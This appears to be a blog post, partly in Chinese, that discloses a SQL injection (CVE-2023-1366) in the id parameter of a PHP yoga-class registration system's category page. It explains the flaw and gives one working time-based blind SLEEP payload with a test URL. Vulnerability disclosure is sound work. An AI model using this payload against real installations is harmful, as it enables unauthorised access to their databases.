Headline
CVE-2023-1366: SourceCodester Yoga Class Registration System manage_category sql injection_Dwayne_Wade的博客-CSDN博客
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0. It has been classified as critical. This affects the function query of the file admin/categories/manage_category.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222873 was assigned to this vulnerability.
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
SourceCodester Yoga Class Registration System manage_category sql injection
url:admin/categories/manage_category.php
Abstract:
Line 3 of manage_category.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
- Data enters a program from an untrusted source.
- The data is used to dynamically construct a SQL query.
In this case, the data is passed to query() in manage_category.php on line 3.
http://localhost/php-ycrs/admin/?page=categories/manage_category&id=8
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=categories/manage_category&id=8' AND (SELECT 5439 FROM (SELECT(SLEEP(5)))TiOT) AND 'iAsm'='iAsm
Download Code:
https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html